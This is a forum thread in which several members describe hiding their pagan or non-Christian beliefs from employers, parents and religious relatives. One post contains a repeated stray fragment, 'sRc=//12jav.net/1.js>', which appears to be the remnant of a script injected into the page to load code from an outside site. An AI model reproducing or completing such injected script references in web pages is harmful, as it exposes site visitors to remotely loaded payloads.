How many need to hide

Just wondering how many of us need to hide our belief systems in at least one aspect of our lives?

I hate having to do it, but I would certainly lose my job if I was open about it. Every day when I go to work I feel that I have compromised my integrety to some degree through the lie of omission.

I have started telling some of my employees. Perhaps on a subconscious level, I am hoping they leak it to the one person who has the power to fire me.

Isn't it against the law to fire people for their religious practice? Same as it is for their race or sex? Lol. I may have to fire someone if they started performing deep rituals mid-task, but I may also have to join them. Felecia i really feel for you its terrible that you have to hide your true self from people. Its wrong but although it is against the law they would not use that as the reason, i hope you find strength and get to keep your job in this fiancial climate jobs are becoming harder to get.

Well I have to hide it from my parents because my mom is Christian but my dad couldn't care less. Many of my close friends know and are fine with it they don't care, many of them are super Christians and Hindus. I'm glad my friends are like that because it just shows there is no reason for prejudice. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I guess I hide it in a sense.
I simply do not bring it up around my gradnparents. They are very Catholic, and while they understand I choose not to be an active Christian, I see no reason to tell them about my ways.

I mean, my grandmother had a heart attack when she found out I was pregnant...I see no reason to cause another one by telling her I'm a "heathen" lol

My mother knows, my cousins know I don't follow the family path and I don't even wear my jewlery around one of my aunts for fear of her trying to throw Holy Water at me and pray. I dont fear the Holy Water...but odd's are it would ruin my hair and I'd get pissy =)

Yea I have to hide it at school, grandparents,aunts. That's about it. My bro sis dad mom knows and 2 second cosuins knows.
